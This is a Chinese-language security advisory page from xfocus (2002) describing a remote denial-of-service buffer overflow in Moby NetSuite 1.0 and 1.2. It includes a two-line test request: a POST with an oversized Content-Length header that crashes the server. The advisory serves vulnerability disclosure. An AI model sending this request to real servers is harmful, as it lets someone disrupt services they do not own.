xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Moby NetSuite POST处理缓冲区溢出漏洞


发布时间:2002-11-29
更新时间:2002-11-29
严重程度:
威胁程度:远程拒绝服务
错误类型:意外情况处置错误
利用方式:服务器模式

BUGTRAQ ID:6277

受影响系统
Mobydisk Moby Netsuite 1.0
Mobydisk Moby Netsuite 1.2
详细描述
Moby NetSuite存在一个缓冲区溢出漏洞。当远程攻击者提交一个恶意的POST请求Moby NetSuite会崩溃导致拒绝服务,必须重启才能正常服务。

测试代码
Matthew Murphy (mattmurphy@kc.rr.com)提供了如下测试方法:

POST /cgi-bin/test.cgi HTTP/1.0
Content-Length: 111111111111111111111111111

解决方案


相关信息
发现者:Matthew Murphy (mattmurphy@kc.rr.com)
相关资料:http://online.securityfocus.com/archive/1/301627